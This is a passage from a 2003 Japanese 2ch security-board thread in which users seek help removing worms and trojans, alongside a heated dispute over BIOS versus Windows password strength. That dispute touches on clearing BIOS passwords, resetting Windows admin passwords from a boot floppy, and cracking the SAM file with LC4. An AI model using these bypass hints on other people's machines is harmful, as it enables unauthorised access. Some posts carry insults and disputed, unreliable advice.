> よりマイクイロソフトの責任を明確にせずに済むからでしょう。)
>
> 一般論で言えばインストールせずに別のOSを起動さえすれば
> データを盗んだりできるという事です。しかし、大量のファイルから
> 目当てのファイルを探すのは困難ですし、日本語の場合にはファイル
> 名の文字化け等の問題もあります。また、大量のデーターを短時間に
> 盗むのにインターネット回線を使うならやはりWindowsもしくは
> その互換OSを起動した方が有利です。ですから、あなたの紹介
> したツールもa Windows-like environmentというのを実現できると
> いうのをセールスポイントにしてるのでしょう。

295 :名無しさん@お腹いっぱい。:03/11/15 00:15
俺は、ブートフロッピーで解除は1分と言ったはずだぞ。
お前がバッテリー抜いてパスワード解除できると引用したページでは10分以上となっていたが、
3分で飛ぶことはどうやって確認したんだ? この嘘つき。

http://pc.2ch.net/test/read.cgi/sec/1068471471/275
275 :薮パソユーザー ◆0fQkHdNop2 :03/11/13 12:52
> >>267
>
> マイクロソフトは別のOS入れればパスワード回避できると言って
> ますがLinuxとは一言も言ってません。
>
> >>269
>
> >ちなみにfdかcdかは些末なことだと俺は思うが、
> >そんなに重要だと感じるなら、googleででも検索してみそ。
>
> 仮に、1FDの解除デイスクが実在するなら(Linuxに精通してれば)
> 単一パーティションでも5分くらいで解除可能でしょうが、
> あなた方は口だけです。1FDのLinuxブートディスクにフォーマット
> の異なるNTFSのパスワード解除ツールが入る余裕があるというのは
> 実例を示されないと信用できません。
> あなた方がそういうのが可能だと言うのですから示してください。

296 :名無しさん@お腹いっぱい。:03/11/15 04:37
>>286
おどしてる積もりかよ(w

297 :名無しさん@お腹いっぱい。:03/11/15 08:59
HDクラッシュのウイルスってなあに?
おせーてちょ

298 :薮パソユーザー ◆0fQkHdNop2 :03/11/15 10:05
>>297

色々あるでしょうけど、有名なのはWhiterですね。
http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_WHITER.D

299 :名無しさん@お腹いっぱい。:03/11/15 10:32
クラッシュの意味が違う気がします…

300 :名無しさん@お腹いっぱい。:03/11/15 10:58
勝手に「~」というファイルができてしまうのですが
これはウィルスなんでしょうか?
履歴が消えたりすぐ固まったりしてPCの調子が良くないです。
PCの事はまるで無知なのですが教えていただけますか?

301 :名無しさん@お腹いっぱい。:03/11/15 11:02
すみません少し前に同じ質問ありましたね。
読んできます。

302 :名無しさん@お腹いっぱい。:03/11/15 11:03
昨日、突然大量にウイルスメールが送られてきたんです。
今までそんなことほとんどなかったんでビクーリしますた。
で、今朝メールチェックしたらこんな文面のメールが…。

>お客様各位

>11月14日(金)10時30分から12時30分にかけて、「DigiPaサポートセンター」か
>ら一部のお客様宛に以下の件名でウィルスが含まれている可能性があるメールの
>誤送信が発生いたしました。件名は「Net Security Update」「last net pack」
>などウィルスにより無作為につけられたものです。


>弊社のメールサーバ切替時にテスト使用したサーバがW32.Swen.A@mmに感染した
>ことが原因です。大変ご迷惑をお掛けしましたことを深くお詫び申し上げます。(以下略)

…これは「氏ねやカス」などと逝ってあげるべきでしょうか?
それとも、こういうことはよくあることなのでしょうか?
それなら軽く流すべきかとも思うのですが…。

303 :名無しさん@お腹いっぱい。:03/11/15 11:07
>>302
鼻で笑うのが正解

決してν速とかにスレを立てないように!!
絶対立てるなよ、絶対だZO

304 :名無しさん@お腹いっぱい。:03/11/15 11:10
>>303
ええと、早くスレ立てろ、と急かされている様にも感じるのですが…(w
鼻で笑っておくことにします。レスありがとうございました(-人-)

305 :名無しさん@お腹いっぱい。:03/11/15 11:46
>>295 道灌。ほんと、藪のような馬鹿なうえに強情なアフォにつける薬はない。

FD1枚でWindowsの管理パスを書き換えるツール、とこれだけヒント出して
やってもまだ見つからないんだからな。それでリンク貼るとまた意味不明の
クダ巻いてシカトする気だろ。藪はMSの技術情報もシカトだからな。

306 :名無しさん@お腹いっぱい。:03/11/15 11:48
>>302
SWEN@MM(SWEN.A) スレ
http://pc.2ch.net/test/read.cgi/sec/1064010406/
見て味噌。

307 :名無しさん@お腹いっぱい。:03/11/15 11:57
?????????????? 藪パソユーザー問題??????????????????????
http://tmp2.2ch.net/test/read.cgi/tubo/1068207529/48
> 「BIOSパスワードよりWindowsパスワードが強い」という一つの知ったかを
> 糊塗するために、これだけ嘘を重ねられるのは、一つの才能
> 「BIOSパスワードでBIOS書き換えウイルスを防御できる」
> 「NTFS読めるのはLindows」
> 「最近のパソコンは全て1パーティション」
> 「BIOSパスワードは初心者でもバックアップ電池抜いて簡単に消去できる」
> 「BIOSパスワード消去は3分」←自分で引用したページは10分
> 「Linuxのブートフロッピーはlinuxに精通して無いと作れない」 
(藪に作れないだけw) これらに加えて
「Windows管理者パスワードを簡単に書き変えるツールは存在しない」(いくつもある。ぐぐれよ)
「あなたがたは口だけです」と誹謗


308 :名無しさん@お腹いっぱい。:03/11/15 12:01
漏れのわ体験版だから、SAMわコピーできても上書きできないんだな。
んでもLC4で解析わできるんだな。

309 :名無しさん@お腹いっぱい。:03/11/15 12:51
>>300
ウイルスじゃなくて、修正プログラムのせい
330994 [MS03-014] Outlook Express 用の累積的な修正プログラム (2003 年 4 月)
ttp://support.microsoft.com/default.aspx?scid=kb;JA;330994

対象方法
825380 MS03-014 適用後 「~」というファイルが作成される
ttp://support.microsoft.com/default.aspx?scid=kb;JA;825380
Windows.FAQ - デスクトップに ~ というファイルが作成されます。Outlook Express で添付ファイルの保存先が記憶されません
ttp://homepage2.nifty.com/winfaq/c/oetrouble.html#1475

310 :名無しさん@お腹いっぱい。:03/11/15 14:17
論理的思考の出来ない馬鹿は救いようが無いな。
議論の中で、パスワード破る対象は「他人のPC」だ。
どうやって、他人のPCの説明書を簡単に、そしてFDD1枚より安価に入手するんだ?

http://pc.2ch.net/test/read.cgi/sec/1068471471/181
181 :薮パソユーザー ◆0fQkHdNop2 :03/11/12 17:52
> >>176
>
> 取扱説明書に書いてあるでしょう。
> ただし、ノートパソコンでははずしにくいものが多いそうですけど。

311 :名無しさん@お腹いっぱい。:03/11/15 17:30
良くこういう嘘が平気でつけるなあ。知らない人が嘘に騙されないように解説しておきましょう。
最近のメーカー製のPCは扱いやすさを向上させるため、ドライバーなしで開けられるように
なっているものがあります。この場合マニュアルを見ないとケースの開け方がわからない場合があります。
最新のDELLのケースでつい最近はまりました。
次の障壁は省スペース性です。CMOSのバックアップメモリは頻繁に取り替えるものではないので、
アクセスしやすい場所に配置されているとは限りません。最悪HDDを取り外さ無いとアクセス出来ないかもしれません。
運良く、ここまでたどり着けたとしましょう。しかし馬鹿がhttp://pc.2ch.net/test/read.cgi/sec/1068471471/109
でほざいている手順では3分でクリアできません。
ftp://ftp.asus.com.tw/pub/ASUS/Barebone/Pundit/manual/j1181_pundit.pdfの5-10を見てみましょう。
バッテリーを取り外した後に「3 下図の端子をショートさせる」という手順が必要です。
この機種は、バッテリーの交換時にバックアップするコンデンサーがあるからです。
という事で、馬鹿がhttp://pc.2ch.net/test/read.cgi/sec/1068471471/109でほざいていることは
全くの大嘘です。

http://pc.2ch.net/test/read.cgi/sec/1068471471/109
109 :薮パソユーザー ◆0fQkHdNop2 :03/11/12 11:42
>
> デスクトップ機のBIOSパスワードはBIOSバックアップ用リチウム電池を
> はずせば簡単に解除できます。3分で解除可能です。これはシロウトでも
> できます。一部のノートパソコンでも電池をはずすかジャンパでBIOS
> パスワード解除できます。

312 :名無しさん@お腹いっぱい。:03/11/15 19:33
455 名前:名無しさん@お腹いっぱい。 :03/11/15 18:41
【BIOS】パスワードどっちが強い?【Windows】
http://pc.2ch.net/test/read.cgi/sec/1068888218/

スレ立ったみたいだから、
・BIOSパスvsWinパス
・現行マシンのパーティション数
などの話はそっちでやってください。

このスレではスレ違いであり、それを続けるなら嵐も同様です。
薮さんが中心となっているので、藪さんから積極的に移動していただけると助かります。
少しでもセキュリティ初心者の事を考えるなら、お願いします。


313 :名無しさん@お腹いっぱい。:03/11/15 20:00
>>312
藪、とうとうコテハン使うの止めたのか?


314 :名無しさん@お腹いっぱい。:03/11/15 20:01
>>312
このアスペルガーなもったいぶったアフォな口調は藪でしょう。
こんなアフォが同時に二人もセキュ板にいるという可能性は
無限小 ww

315 :名無しさん@お腹いっぱい。:03/11/15 21:19
それでも人体が発する放射線でPCが誤作動するよりはあり得るがな(藁

316 :名無しさん@お腹いっぱい。:03/11/15 21:22
VBS.Terrosistってウィルスに感染してしまいました
Folder.httって隠しファイルがイパーイ
駆除方法載ってるttp://www.symantec.com/region/jp/sarcj/data/v/vbs.terrosist.html
を見ても駆除できません
誰かお助け・・・

317 :名無しさん@お腹いっぱい。:03/11/15 21:23
>>316
もちっと詳しく
どういう状況で駆除できないの?
「アクセス拒否」で削除できないの?
環境は?



318 :名無しさん@お腹いっぱい。:03/11/16 04:54
>>312
「藪さん」かぁ? 自分を呼ぶのにサンづけするのは
ワダサン見習ったのか、くそ藪?

319 :名無しさん@お腹いっぱい。:03/11/16 05:02
>>318
でも「藪さんが中心となっているので」はあってると思う。
自己中心って意味で

320 :名無しさん@お腹いっぱい。:03/11/16 05:06
悪ファイルが削除できなかったら、
レジストリを修復→再起動→悪ファイル削除→(゚д゚)ウマーとなるはず。
シマンテックは「ノートン使え」というばかりで不親切。
トレンドのほうが(英文だが)詳しい。削除するレジストリの値を参考にしれ。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_TERROSIST.A


321 :名無しさん@お腹いっぱい。:03/11/16 14:44
>>317
>>320

なんとか解決しました。
レスありがdでした。

322 :名無しさん@お腹いっぱい。:03/11/16 19:57

あのですね、

707を開けろ、通せと(素人知恵で一生懸命入れてみた)FWが言うのですが。

これ、なんでしょうか?
どっかからノックされてるんでしょうか?

323 :名無しさん@お腹いっぱい。:03/11/16 20:09
>>322
それは外からの接続要求なのか、中からの接続要求なのか。
どっち?

324 :名無しさん@お腹いっぱい。:03/11/16 20:52
>>322
OS、FW名、そのとき起動したアプリ、接続しようとした相手先、とかも報告てくれ。
(でないと害基地回答者の一方的なタワゴト聞かされるはめになるw)





325 :名無しさん@お腹いっぱい。:03/11/17 01:42
ありゃ、今晩は害基地粘着誹謗罵倒回答者出てこないね。英気を蓄えてるのか? コワ


326 :名無しさん@お腹いっぱい。:03/11/17 03:22
>>323
>>324

うわありがとう。
名称忘れましたが、「SVCHOST」の偽者を使っている
ワームに感染してました。
(偽者=大文字、Win32以下の”WINS”ディレクトリにいました。)

まったくいつの間に・・・


327 :名無しさん@お腹いっぱい。:03/11/17 11:38
>>326
それはMSBlast.D=Nachi=Welchiaワームと思われ。対策しないと
再感染するぞ。
Blasterスレ part5
http://pc.2ch.net/test/read.cgi/sec/1065964513/
に詳しい情報がある。

328 :名無しさん@お腹いっぱい。:03/11/17 13:15
WinUpdateやXPのアクティべーションより先にルータやPFWの設定を済ませろ。

329 :薮パソユーザー ◆0fQkHdNop2 :03/11/17 14:13
しかし、>>322氏のパソコンがNachi(Welchia)ワームに感染したと
すれば、どうしてFWがありながらNachi(Welchia)ワームに感染した
のでしょうか?何というFWか知りたいですね。

330 :名無しさん@お腹いっぱい。:03/11/17 14:48
ウイルスバスターが反応。「駆除できませんでした」さらに「隔離できませんでした」。
でもPCに特別異変は起きません。ウイルス検索しましたが感染ファイルは一つも出ず。
これってウイルスに感染してるんですか?

あと、ウイルスに感染すると個人情報漏れたりしますか?ネット通販しない方がいいのかな?

331 :名無しさん@お腹いっぱい。:03/11/17 15:35
ウィルスに感染したようで、IEを開くことができません。
htmlファイルに
<script language=vbscript>
document.write "<div style='position:a …
といった文字列が組みこまれてます。
ウィルス情報など調べたのですがウィルス名すらわかりません。
ブラスターとも違うようですし…


332 :薮パソユーザー ◆0fQkHdNop2 :03/11/17 15:53
>>330

ウィルス対策ソフトを常駐で作動させている場合、初期設定では
駆除も隔離もできないタイプのウィルスは「削除」しますので
心配ないと思います。
最近は個人情報を送信するワームが多く発見されてます。
それ以上に危険なのは悪質アダルトサイトの悪質スクリプトです。
このダウンローダーはトロイに分類されている場合でウィルスとして
分類される場合もありますがウィルスに分類されてない場合も
あります。そういうサイトにセキュリティーレベルを下げて行ったり
Windows updateせずに行ったりすると最悪の場合は重要個人情報を
抜かれる危険があります。

333 :薮パソユーザー ◆0fQkHdNop2 :03/11/17 16:10
>>331

アンチドートでウィルスチェックしてください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504


334 :薮パソユーザー ◆0fQkHdNop2 :03/11/17 16:17
>>331

Redlofの可能性が高いですので、Redlofの場合には↓見てください。
http://members.jcom.home.ne.jp/aisora/subREDLOF.htm

ウィルスでない場合にはad-awareでスパイウェアもチェックして
ください。

尚、VBスクリプトウィルスや悪質スパイウェアの多くは
Windows updateによって防止できますので必ずWindows update
してください。

335 :331:03/11/17 17:15
ウィルスチェックしてみましたが、ウィルスは見つかりませんでした。
相変わらずIEは強制終了されてしまいます。
どうすれば良いのでしょうか?

336 :名無しさん@お腹いっぱい。:03/11/17 17:22
>>335
スパイウェア削除ソフトSpybot 5
http://pc.2ch.net/test/read.cgi/sec/1057338156/l50
スパイウェア発見専用ソフト「Ad-aware」Part7
http://pc.2ch.net/test/read.cgi/sec/1058423961/l50

これもやっておいで

337 :名無しさん@お腹いっぱい。:03/11/17 18:13
>>334 藪パソユーザーさんへお願い
あなたは「BIOSパスワードよりWindowsパスワードが強い」という一つの知ったかを
糊塗するために「最近のパソコンはみなパーティションが一つだけ」というのオオワライな
電波を流していますが、あなたの最近の大嘘の中では実害は少ない方でしょう。しかし、
あなたはマイクロソフトの技術情報をあげて虚偽を指摘されても
http://pc.2ch.net/test/read.cgi/sec/1068471471/102)取り消そうとしないばかりか、

http://pc.2ch.net/test/read.cgi/sec/1068471471/110
名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 11:43
> 本当にしつこい馬鹿がいますね。

等々の暴言を吐いていますね。こういう虚は実害があります。初心者、部外者は
あなたがコテハンで多数のレスをつけているとうことだけで「2chの権威」と誤解
するおそれがあるので「粘着アラシは放置」というわけにはいかないと思います。
嘘を訂正し暴言を謝罪してからコテハン使うようにお願いします。

また藪パソさんは「Outpostはデフォールトでブラスターを防げない」というデマを執拗に
流していましたね。質問者のみなさんは、このコテハンのいうことには十分注意してください。



338 :名無しさん@お腹いっぱい。:03/11/17 18:47
アンチドート宣伝員は書き込む際の注意にある通り、広告料を払いなさい。

339 :名無しさん@お腹いっぱい。:03/11/17 18:57
Redlof.Aに感染してしまいました…。
いくつかのサイトを見てRedlofsterを使ったんですが、
他にもするべきことはありますか?
htmlのファイルは全部消すしかないのでしょうか?


340 :名無しさん@お腹いっぱい。:03/11/17 19:02
ワクチンソフトを買ってくる事

341 :339:03/11/17 19:10
>>340
はい、今度の休みあたりにでも買ってくることにします。
…ノートンでいいのでしょうか?
今まで怠りすぎですね

342 :名無しさん@お腹いっぱい。:03/11/17 19:18
>>341
あと、Windowsアップデートしなさい。
http://windowsupdate.microsoft.com/

343 :339:03/11/17 19:21
>>342
すいません、アップデートはネットに繋いでなくても出来ますか?
感染した家のPCは繋いでないので…(書かなくてすいません

344 :名無しさん@お腹いっぱい。:03/11/17 19:30
Windowsカタログか、MSのセキュリティ情報のページや、ダウンロードセンター
で繋いでるのPCでパッチ類落として繋いでないのにCD-Rとかでコピー

しかし繋いだ方が圧倒的に速い
素人でなくともお勧めしない、無駄な行為

345 :339:03/11/17 19:38
htmlは大丈夫なのか気になるのですが…

>>344
繋ぎたいのですが…家の都合で…

>340
>342
>344
まとめてになってしまいますが、レスありがとうございました



346 :名無しさん@お腹いっぱい。:03/11/17 19:49
>>345
HTMLのソースから感染コードを消せば大丈夫かと。

347 :335:03/11/17 20:31
しつこくてすみません。
スパイウェアの削除もwindowsのアップデートもしましたが、
やはり状況はそのままです。
ウィルススキャンしてみてもウィルスは検出されませんでしたと出るだけで
まだウィルスの名前すらわかりません。
どなたかわかる方いらっしゃいませんか?

348 :Hacktool.WKRShell:03/11/17 22:19
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20031112_MS03-049
EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12)
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00140.html
MS03-049が危険な理由 (ZDNet)
http://www.zdnet.co.jp/enterprise/0311/14/epn02.html


349 :Hacktool.WKRShell:03/11/17 22:20
あなたが送られたファイルに関する情報や現在の状態をお知らせします。
ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名:
結果: このファイルは次のウィルスに感染しています:
Hacktool.WKRShell
デベロッパーノート:
ファイル名 is non-repairable threat. NAV with the latest beta definition detects this. Please delete this file and replace it if neccessary. Please follow the instruction at the end of this email message to install the latest beta definitions.

Hacktool.WKRShell is non-repairable threat. NAV with the latest beta definition detects this. Please delete this file and replace it if neccessary. Please follow the instruction at the end of this email message to install the latest beta definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。
(C)2003 シマンテック・セキュリティ・レスポンス
(P)2003 シマンテック・セキュリティ・レスポンス


350 :名無しさん@お腹いっぱい。:03/11/17 23:09
>>349
コピペ邪魔

351 :名無しさん@お腹いっぱい。:03/11/17 23:32
>>331へのフォローはどうなりましたか?

352 :名無しさん@お腹いっぱい。:03/11/18 06:15
皆様のご回答、よろしくお願い致します。
下記アドレスのウィルスに感染いたしました。
うかつにも、添付ファイル付のメールを実行してしまった事が
先日ありましたので、それが原因ではないかと思っております。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SMAL.13.DRP&VSect=T

ただ、上記サイトの対処法など、様々な術は尽くしましたが、
一向に改善いたしません。
詳しく言いますと、明記されているレジストリの値がないため
削除できず、MSGSRV32.EXE というファイルが常に実行されており
削除できません。
セーフモードでも削除できませんでした。

また、感染しているファイルも検索できません。

ちなみに使用OSはMeです
よろしくお願い致します。

353 :名無しさん@お腹いっぱい。:03/11/18 08:14
さっき気づいたのですがdxsound.exeというのが常駐してました。
ぶつはc:\windowsにあって日付は10日前ほどのもの。
レジストリのrunのとこにも実行する記述がありました。
googleで検索しても何も出ないけどこれも例のごとくバックドア型トロイかな?
こんなことが良くあるんだなぁ。ちなみにアンチウィルスソフトでは感知できず。


354 :名無しさん@お腹いっぱい。:03/11/18 08:42
>>353
トロイかワームの確立高し
FWは反応しない?
常駐解除して様子みときな。 PCに不都合なければ削除

355 :名無しさん@お腹いっぱい。:03/11/18 09:05
>>352
本当に感染しているの?
以下自己責任で、
タスクマネージャから、MSGSRV32.EXEを強制終了する。
スキャンして、発見されたら、このトロイを削除

356 :薮パソユーザー ◆0fQkHdNop2 :03/11/18 12:51
>>352

Windows MEならシステム復元機能で感染前の時点に戻してから
一旦、復元機能を無効(復元ポイントにウィルスが含まれていると
除去できないので)にしてウィルスチェックして除去してください。
場合によってはセーフモードで起動してください。
ウィルス除去後に再度システム復元機能を有効にしてください。

357 :薮パソユーザー ◆0fQkHdNop2 :03/11/18 13:01
>>353

10日ほど前に無料ソフトをインストールしたりしませんでしたか?

Windows XPかMEなら10日以上前に復元してください。
それ以外ならad-awareとspybotでスパイウェアチェックして
Pestpatrolでもチェックしてください。
尚、ウィルスが心配ならアンチドートでスキャンしてください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504

358 :薮パソユーザー ◆0fQkHdNop2 :03/11/18 13:02
>>352-353への注意

Windowsのシステム復元機能を使った場合は必ずWindows update
し直して下さい。

359 :薮パソユーザー ◆0fQkHdNop2 :03/11/18 13:11
>>331 >>335

Windows上書きインストールという大技があるそうです。
もし、あなたのパソコンで上書きインストールが可能ならウィルスを全部
削除して重要ファイルはバックアップしてからトライされたらどうですか?
http://www.sbpnet.jp/vwalker/feature/special_old/sp_20020101_fukugen/
http://www.geocities.co.jp/SiliconValley-Bay/5881/uwagaki_inst.html


360 :薮パソユーザー ◆0fQkHdNop2 :03/11/18 13:14
>>331 >>335

忘れてました。>>339の前にこれの可能性がないか見てください。
http://homepage2.nifty.com/winfaq/c/oetrouble.html#319

361 :名無しさん@お腹いっぱい。:03/11/18 13:14
(・∀・)

362 :名無しさん@お腹いっぱい。:03/11/18 13:31
>>356-360

363 :名無しさん@お腹いっぱい。:03/11/18 16:55
>>360
藪パソユーザーさん。忘れているのはこの質問に対する回答ですよ。

あなたはマイクロソフトの技術情報をあげて虚偽を指摘されても
http://pc.2ch.net/test/read.cgi/sec/1068471471/102 取り消そうとしないばかりか、
http://pc.2ch.net/test/read.cgi/sec/1068471471/110
名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 11:43
> 本当にしつこい馬鹿がいますね。

等々の暴言を吐いて逆に指摘者を誹謗していますね。初心者部外者も多い質問板の性質上
放置しておくわけにはまいりません。ぜひ虚偽の取り消しと暴言の謝罪をお願いします。

以上、何度かお願いしてまいりましたが、まだ回答をいただいておりません。回答がいただけるまで
お願いを続けさせていただきますのでご承知おきください。

364 :名無しさん@お腹いっぱい。:03/11/18 17:04
馬鹿age

365 :名無しさん@お腹いっぱい。:03/11/18 18:01
>>360
335は別の人ですが、何か?
つーか、htmlからコード削除するだけでいいのに、何で上書きインストール薦めてるんだ?

366 :339:03/11/18 18:09
>>346
そうなんですか、ありがとうございます。
消したほうがいいというサイトがあったもので…
安心しました。


しくこくなってしまいますが、
リカバリはしたほうがいいのでしょうか?
できれば? それともすぐに?
するのならそれはウィルス全部に言えることなのでしょうか?

367 :薮パソユーザー ◆0fQkHdNop2 :03/11/18 18:34
>>365

別の人って、>>335>>331だと言ってたから、>>331=>>335という
前提で答えたのですけど。それとも自作自演で私をはめてるのですか?


335 :331 :03/11/17 17:15
ウィルスチェックしてみましたが、ウィルスは見つかりませんでした。
相変わらずIEは強制終了されてしまいます。
どうすれば良いのでしょうか?


368 :名無しさん@お腹いっぱい。:03/11/18 18:42
>>366
ウイルス対策ソフトのサイトとかで危険度が高いものについては再インストールはすべき。
だけど、今回のVBS_REDLOF.Aについてはしなくても大丈夫。
精神的に気持ち悪いなら、再インストールしてもかまわないけど。

一番いいのは感染しないことなので、これからはセキュリティ意識を持って。

369 :名無しさん@お腹いっぱい。:03/11/18 20:24
自作自演で私をはめてるのですか?
自作自演で私をはめてるのですか?
自作自演で私をはめてるのですか?

370 :名無しさん@お腹いっぱい。:03/11/18 23:16
小規模MMO板(=ネットゲーム)から失礼します。

このたび、複数人のゲーム内の貴重なアイテムが盗まれる事態が発生しました。
http://game3.2ch.net/test/read.cgi/mmominor/1069086731/34-
ゲーム中に「他の方が接続を行っています」という警告がでたという報告もあったことから、
パスワードが盗まれた可能性が高い、とみられます。

これがQhostというトロイが原因か、お尋ねしたいのです


原因を追っていく段階でゲーム内であるプレイヤーが宣伝していたURLが怪しい、ということになりました
http://game3.2ch.net/test/read.cgi/mmominor/1069086731/97-

そのページのソースを見て、ソースに書かれているファイル名を検索した結果
ttp://www.excite.co.jp/world/url_cn/body/?wb_url=http%3A%2F%2Fminghui.cc%2Fmh%2Farticles%2F2003%2F11%2F11%2F60328.html&wb_submit=%E3%82%A6%E3%82%A7%E3%83%96%E3%83%9A%E3%83%BC%E3%82%B8%E7%BF%BB%E8%A8%B3&wb_lp=CHJA
のページがみつかりました。
文意をよみとってみるとなんらかのトロイであるようみられます

推測した結果
ttp://internet.watch.impress.co.jp/cda/news/2003/10/03/638.html
ではないかと結論をだしたのですが、それがあってるかどうか確かめるすべはあるでしょうか?

自分のつたない推測は
http://game3.2ch.net/test/read.cgi/mmominor/1069086731/111-
からです。

またttp://www.symantec.co.jp/region/jp/sarcj/data/t/trojan.qhosts.htmlの駆除プログラムで
問題なく解決するのでしょうか、至らないところがあればご指摘ください

371 :名無しさん@お腹いっぱい。:03/11/18 23:28
パソコンを立ち上げると同時に「washing your system crean!」という表示が画面いっぱいに出て、全部英語なので読めなくて適当に×印を押すと、「waiting…○%」と表示され、100%になると普通の画面に戻ります。
立ち上げる度なので面倒くさいのですが何かのウイルスなんでしょうか…?





372 :名無しさん@お腹いっぱい。:03/11/19 01:11
>>370
どうやってQhostと推測したの?
asp,キーロガー,トロイの木馬の組み合わせからだったら短絡的過ぎ。
とりあえず>>370の英文ページ
http://www.clearwisdom.net/emh/articles/2003/11/16/42294.html

バスターやノートンのオンラインスキャン、↓の評価版でスキャンしてみなされ。
http://pc.2ch.net/test/read.cgi/sec/1029135457/l50

>>371
マルチ

373 :名無しさん@お腹いっぱい。:03/11/19 01:35
>>370
ファイル名のみでウイルスの種類を特定するのは無理がありすぎ。

たとえばttp://www.symantec.com/region/jp/sarcj/data/t/trojan.qhosts.html
に書かれているようなレジストリの変更などの症状はあったのかい?
lhxyexe.exeをシマンテックに送りつけてを解析してもらえ

374 :名無しさん@お腹いっぱい。:03/11/19 01:53
回答ありがとうございます
いくつか符合してる点があったと感じてしまったのでたしかに短絡的に考えてました
自分は感染して無いのでスレッドの方に実行するようお願いしてみます。

375 :名無しさん@編集Chu♪:03/11/19 04:28
タスクトレイにDameWare というアイコンができて消せません
消し方教えてください
OSはWinsows2000です

376 :名無しさん@お腹いっぱい。:03/11/19 06:20
>>375
氏ね。

377 :あぼーん:あぼーん
あぼーん

378 :薮パソユーザー ◆0fQkHdNop2 :03/11/19 10:33
>>371

スパイウェアだと思います。
Windows XPかMEならシステム復元で戻してその症状が消えたのを確認して
復元機能を一旦無効にしてください。そしてウィルスチェックして
復元機能を再度有効に戻してください。それからWindows updateして
ください。
復元機能が使えない場合はad-awareでスパイウェア削除してください。
それでも駄目なら次のいずれかに行ってください。

(1)エロサイト見たら・・・助けてください! @初心者板
http://pc2.2ch.net/test/read.cgi/pcqa/1067657959/3-4

(2)【アダルトサイト被害対策の部屋】
http://higaitaisaku.web.infoseek.co.jp/index.html

379 :薮パソユーザー ◆0fQkHdNop2 :03/11/19 10:40
>>375

遠隔操作ツール(製品版トロイ)ですね。
Windows XPかMEならシステム復元で戻してその症状が消えたのを確認して
復元機能を一旦無効にしてください。そしてウィルスチェックして
復元機能を再度有効に戻してください。それからWindows updateして
ください。
復元機能が使えない場合はPestPatrolでチェックしてください。
DameWare Mini Remote Controlなら、↓を参考に駆除してください。
http://www.pestpatrol.com/PestInfo/d/dameware_mini_remote_control.asp


380 :薮パソユーザー ◆0fQkHdNop2 :03/11/19 11:27
>>375

すみません。Win2000だったんですね。>>379の前半部分は無視して
ください。
それから、そういうのを仕込まれないように注意してください。

381 :名無しさん@お腹いっぱい。:03/11/19 11:48
先程、オンラインチェックでpc購入後4年目にして
初の一件hitしてしまったんですが、先輩方ご教授おながいします。
「JS,SPAWN.A」というのが、Temporary internet Files...にあるとのこと。
コレってヤバイですか?それとも、何かのキャッシュで無害でしょうか?
ちなみに、スタートメニューからのファイル検索では見つからず
直に、Temporaryから削除してみようか・・と思ったのですが
それでも見つけられませんでした。

よろしくお願いします。

382 :名無しさん@お腹いっぱい。:03/11/19 11:53
未だにこんな感じで135番にアクセスがあります。↓
2003/11/19 09:54:28 IP_Filter REJECT TCP 81.61.129.119:2181 > 【ルーターのIPアドレス】:135 (IP-PORT=7)

これってMSブラスターですよね?



383 :339:03/11/19 12:03
>>368
はい、今まで意識が低すぎた事を実感しています。
どうもありがとうございました。

384 ::03/11/19 12:52
pcを起動すると
申し訳ありませんが新しく更新したファイルかソフトウエアが原因で
起動できませんでした。
などと唄ってきてセーフモードや再起動,AGVモードを有効にする
などコマンドが表示されるが結局どれ選んでも同じ事の繰り返しになってしまう
のですが、当然、前の状態にpcを戻す事もできなく困ってます。
どなたか経験のある方、対処法を教えてください。駆除ツール
とかありますでしょうか?


385 :名無しさん@お腹いっぱい。:03/11/19 13:16
>>384
もっとメッセージを完全に書いてくれないと意味がわかりません
その材料からでは駆除されるべき存在はあなたです

386 ::03/11/19 13:25
ん?まぁ、経験ある人はぴんとくるはずだからね
、、そうじゃない人には語りかけてない。

387 :名無しさん@お腹いっぱい。:03/11/19 13:31
>>384
ああ、俺もなったことあるよ。

再インストールしろ。

388 :名無しさん@お腹いっぱい。:03/11/19 13:33
>>386
FDISK→FORMAT クリーンインストール

389 :名無しさん@お腹いっぱい。:03/11/19 15:30
>>384
ウィルスが原因とはかぎらない。
ヤブ釣でなければ初心者板へGO

390 :名無しさん@お腹いっぱい。:03/11/19 15:36
静かに汁
       /:
   ∧∧ /  :
  (;´ー`/    :
_ / つ/) _  :
〜(⌒)__)  /| ,, :
 ̄ ̄ ̄ ̄ ̄|/,,, . /⌒ヽ 
 ̄ ̄ ̄ ̄ ̄|/,,,    (=゚ω゚= )
        〜〜〜〜〜〜〜〜⌒ヾ〜〜〜



391 :萩パンウーザー :03/11/19 16:12
>>384
      |
      |
   ぱくっ|
     /V\
    /◎;;;,;,,,,ヽそんなエサで
 _ ム::::(,,゚Д゚)::| 俺様が釣られると思ってんのか!!
ヽツ.(ノ:::::::::.:::::.:..|)
  ヾソ:::::::::::::::::.:ノ 
   ` ー U'"U'      


392 :名無しさん@お腹いっぱい。:03/11/19 16:28
コンピュータ・アソシエイツ、消費者向けウィルス対策ソフトを1年無料提供 (ロイター)
[ニューヨーク 18日 ロイター]
 米ソフトウエア大手のコンピュータ・アソシエイツ・インターナショナル(CA)は、
ウィンドウズ利用者向けに1年間無料でウィルス対策ソフトウエアを提供する、と発表
した。
 発表によると、業務用のウィルス対策およびファイヤーウォール・ソフトの消費者向
版である「イートラストEZアーマー」が提供される。
 同社は業務用のウィルス対策ソフト市場では大手だが、消費者向けの同市場では目立
たない存在。
 同社は、米ソフトウエア大手のマイクロソフトの「プロテクト・ユアPC」キャン
